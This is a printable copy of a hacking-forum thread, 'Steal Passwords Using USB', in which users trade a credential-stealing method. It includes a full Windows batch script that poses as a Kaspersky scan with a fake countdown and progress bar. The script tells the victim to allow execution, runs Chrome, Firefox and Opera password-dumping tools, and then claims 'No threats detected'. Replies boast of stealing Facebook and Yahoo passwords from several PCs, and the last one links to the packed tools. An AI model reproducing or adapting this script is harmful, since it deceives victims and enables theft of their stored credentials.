![]() |
|
Steal Passwords Using USB - Printable Version +- Sinisterly (https://sinister.ly) +-- Forum: Hacking (https://sinister.ly/Forum-Hacking) +--- Forum: Tutorials (https://sinister.ly/Forum-Tutorials) +--- Thread: Steal Passwords Using USB (/Thread-Steal-Passwords-Using-USB) |
RE: Steal Passwords Using USB - Retardbre - 02-10-2013 I would always sugguest using Sandboxie when you download such Tools, not saying its backdoored but its always good to be on the safe Site. Regards RE: Steal Passwords Using USB - Retardbre - 02-10-2013 I would always sugguest using Sandboxie when you download such Tools, not saying its backdoored but its always good to be on the safe Site. Regards RE: Steal Passwords Using USB - Retardbre - 02-10-2013 I would always sugguest using Sandboxie when you download such Tools, not saying its backdoored but its always good to be on the safe Site. Regards RE: Steal Passwords Using USB - EZiX_mybb_import9300 - 03-01-2013 woah, this thread is so fucking famous :O thanks all! But hey, among all these replies and comments, i got just 3 thanks :/ if you guys really liked it, do press the Thanks button ![]() And yeah, link password is changed as some leecher has leeched my tut without giving credits. RE: Steal Passwords Using USB - Ex094 - 03-05-2013 I can 100% Vouch that this method works, I swiped 6 PC's with my USB device and got like passwords for Facebook, msn and yahoo! Enjoy your rep! RE: Steal Passwords Using USB - noize - 03-17-2013 Well, nothing special I did, after all. Just wanted to help as this code looks better for me. This is not my script. I just edited Ex094's one. Code: @echo off
color 0a
title Kaspersky scan
echo ############################################################################
echo .
echo ** ** **
echo /** ** ****** /** ** **
echo /** ** ****** ******/**///** ***** ****** ******/** ** //** **
echo /**** //////** **//// /** /** **///**//**//* **//// /** ** //***
echo /**/** ******* //***** /****** /******* /** / //***** /**** /**
echo /**//** **////** /////**/**/// /**//// /** /////**/**/** **
echo /** //**//******** ****** /** //******/*** ****** /**//** **
echo // // //////// ////// // ////// /// ////// // // //
echo.
echo Kaspersky LABS ^| Portable Security Scanner
echo .
echo ############################################################################
echo.
< nul set /p var=Scan starting in 5...
timeout /t 1 /nobreak > nul
cls
echo ############################################################################
echo .
echo ** ** **
echo /** ** ****** /** ** **
echo /** ** ****** ******/**///** ***** ****** ******/** ** //** **
echo /**** //////** **//// /** /** **///**//**//* **//// /** ** //***
echo /**/** ******* //***** /****** /******* /** / //***** /**** /**
echo /**//** **////** /////**/**/// /**//// /** /////**/**/** **
echo /** //**//******** ****** /** //******/*** ****** /**//** **
echo // // //////// ////// // ////// /// ////// // // //
echo.
echo Kaspersky LABS ^| Portable Security Scanner
echo .
echo ############################################################################
echo.
< nul set /p var=Scan starting in 4...
timeout /t 1 /nobreak > nul
cls
echo ############################################################################
echo .
echo ** ** **
echo /** ** ****** /** ** **
echo /** ** ****** ******/**///** ***** ****** ******/** ** //** **
echo /**** //////** **//// /** /** **///**//**//* **//// /** ** //***
echo /**/** ******* //***** /****** /******* /** / //***** /**** /**
echo /**//** **////** /////**/**/// /**//// /** /////**/**/** **
echo /** //**//******** ****** /** //******/*** ****** /**//** **
echo // // //////// ////// // ////// /// ////// // // //
echo.
echo Kaspersky LABS ^| Portable Security Scanner
echo .
echo ############################################################################
echo.
< nul set /p var=Scan starting in 3...
timeout /t 1 /nobreak > nul
cls
echo ############################################################################
echo .
echo ** ** **
echo /** ** ****** /** ** **
echo /** ** ****** ******/**///** ***** ****** ******/** ** //** **
echo /**** //////** **//// /** /** **///**//**//* **//// /** ** //***
echo /**/** ******* //***** /****** /******* /** / //***** /**** /**
echo /**//** **////** /////**/**/// /**//// /** /////**/**/** **
echo /** //**//******** ****** /** //******/*** ****** /**//** **
echo // // //////// ////// // ////// /// ////// // // //
echo.
echo Kaspersky LABS ^| Portable Security Scanner
echo .
echo ############################################################################
echo.
< nul set /p var=Scan starting in 2...
timeout /t 1 /nobreak > nul
cls
echo ############################################################################
echo .
echo ** ** **
echo /** ** ****** /** ** **
echo /** ** ****** ******/**///** ***** ****** ******/** ** //** **
echo /**** //////** **//// /** /** **///**//**//* **//// /** ** //***
echo /**/** ******* //***** /****** /******* /** / //***** /**** /**
echo /**//** **////** /////**/**/// /**//// /** /////**/**/** **
echo /** //**//******** ****** /** //******/*** ****** /**//** **
echo // // //////// ////// // ////// /// ////// // // //
echo.
echo Kaspersky LABS ^| Portable Security Scanner
echo .
echo ############################################################################
echo.
< nul set /p var=Scan starting in 1...
timeout /t 1 /nobreak > nul
setlocal EnableDelayedExpansion
set Counter=0
set Schalter=2
set Width=0
:1
title Kaspersky Portable Security Scanner - Scanning computer
set /a Counter=%Counter% + 1
set /a Display=%Counter% / 2
FOR /L %%A IN (1,1,%Display%) DO (
set Display=!Display!²
)
cls
echo Kaspersky is now scanning for Malware! Please Wait... %Counter%%%
echo ²!Display:~2,47!
if "%counter%" GTR "71" goto check
:checked
if "%Counter%" == "100" goto :1-End
goto :1
:1-End
echo.
echo Checking system integrity...
timeout /t 4 /nobreak > nul
echo Questioning antivirus database...
timeout /t 2 /nobreak > nul
echo You may get alerted of a file execution. Allow the file execution.
timeout /t 2 /nobreak > nul
call chromepass.exe
call passwordfirefox.exe
call operapassview.exe
echo.
echo Scan complete.
echo No threats detected.
< nul set /p var Press any key to exit...
pause >nul
exit /b
:check
if "%counter%" LSS "73" echo . & timeout /t 1 /nobreak > nul & goto checked
if "%counter%" GEQ "98" echo . & timeout /t 2 /nobreak > nul & goto checked
goto checkedRE: Steal Passwords Using USB - Hackthebeans - 05-24-2013 Does this work only when the password is saved in browser or does it just work as keylogger ? RE: Steal Passwords Using USB - Spiderhex - 05-31-2013 Thanks alot mate, quite helpfull at times, just tested it on my own computer and relize I never save passworld, ending up testing it on the home computer and worked perfectly RE: Steal Passwords Using USB - greybat163 - 08-02-2013 This trick doesn't work FULLY. I tried this trick and did all the work accordingly but password from only chrome was been saved. Mozzila's password was not saved in the text doc. (although the password was saved in the browser). I 've tested the trick on my computer to confirm its work. And I got the result above. :Thumbs-Up: RE: Steal Passwords Using USB - Nex23 - 11-05-2013 Packed tools link : http://shiftshared.com/1188aa6fe62651d8 Made it easier to you for download
|